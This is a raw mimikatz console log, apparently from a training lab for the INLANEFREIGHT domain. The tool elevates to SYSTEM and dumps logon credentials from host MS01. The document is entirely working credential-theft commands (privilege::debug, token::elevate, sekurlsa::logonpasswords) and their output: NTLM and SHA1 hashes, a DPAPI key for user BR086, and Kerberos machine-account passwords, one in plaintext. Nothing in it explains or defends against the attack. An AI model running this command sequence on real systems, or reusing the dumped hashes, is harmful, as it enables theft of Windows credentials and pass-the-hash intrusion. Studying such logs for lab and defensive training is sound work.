
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

572	{0;000003e7} 1 D 36114     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;0046d153} 0 D 4726001   	MS01\Administrator	S-1-5-21-4177268742-3573579541-2024302414-500	(11g,24p)	Primary
 * Thread Token  : {0;000003e7} 1 D 4770943   	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 653197 (00000000:0009f78d)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 5:12:00 AM
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 71445 (00000000:00011715)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : fa151ba7d58559380cbe8e909b6ea25b
	 * SHA1     : 16d1dfd4eaa6225f087fb7bf185b460a2a416058
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : PU:B_+ZMC;z.%X$bsKx4$W%T#20Yp9a50Ths5bg_I*"[q)G$K\q<S HSC`J`+tcvndLD7*B2NIxJ _kVCb':1q($lz3n.O8z6pGcXF^T! E7ADl%21:ZTv]3
	ssp :	
	credman :	

Authentication Id : 0 ; 41655 (00000000:0000a2b7)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 652365 (00000000:0009f44d)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 5:12:00 AM
SID               : S-1-5-96-0-2
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 71426 (00000000:00011702)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : MS01$
Domain            : INLANEFREIGHT
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : ms01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 681635 (00000000:000a66a3)
Session           : RemoteInteractive from 2
User Name         : BR086
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 5/1/2026 5:12:01 AM
SID               : S-1-5-21-3327542485-274640656-2609762496-4612
	msv :	
	 [00000003] Primary
	 * Username : BR086
	 * Domain   : INLANEFREIGHT
	 * NTLM     : cf3a5525ee9414229e66279623ed5c58
	 * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
	 * DPAPI    : a976867ce2add4d6df6354686a2d94ab
	tspkg :	
	wdigest :	
	 * Username : BR086
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : BR086
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : MS01$
Domain            : INLANEFREIGHT
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : ms01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 653861 (00000000:0009fa25)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 5:12:00 AM
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 41638 (00000000:0000a2a6)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : 90 cb 44 96 9b 40 d1 3e d2 02 71 ec 1c a1 8c f9 37 ff 38 37 92 de 9d 93 ee f6 6e d6 9a a2 6c 12 85 50 32 c7 c8 86 1f ee 4e ca 3d ec 8a fb 3b bb 54 c4 1c 6f 76 ad 1d 50 d9 db 8d 69 2f aa 94 39 af 2e 54 59 d3 c0 af d8 1e e1 bb 1a 7d 5d d7 b9 04 be cc 60 94 a8 07 20 98 6a 18 1a f7 1a 54 74 a5 4d 28 c0 8f dd 4b 2e 44 04 2a 18 52 5f 3d 6a 21 f8 4b a3 f6 cf 6c 97 15 a6 fc 65 ea 71 a6 f3 2f 5b 92 97 9c 1b b5 92 93 d2 ee ad 90 f1 a9 af 56 99 98 cb 31 51 48 f3 33 a9 e8 c7 d2 f3 9b 99 6b 95 81 9b 6a 29 59 48 d1 6b 0c 46 3c 24 2b 05 95 c2 b9 f9 1e 25 7d da 3d 08 1d 8a 9b a2 d7 c3 ff fe e6 c6 41 59 ee e8 7b f9 ce 8d 3a d4 cc bd 61 b3 7a 10 ba 4e ae 09 de d3 24 67 7c f9 ed 4b 87 4a b7 93 8d 4b 0b 3f 3a ef 1e d4 35 e4 ef e8 
	ssp :	
	credman :	

Authentication Id : 0 ; 40518 (00000000:00009e46)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : MS01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : f8eeca9e4a812105bbf9ea951b0d133b
	 * SHA1     : e5b11d72ba933931eafd6f5298de410efff43219
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!
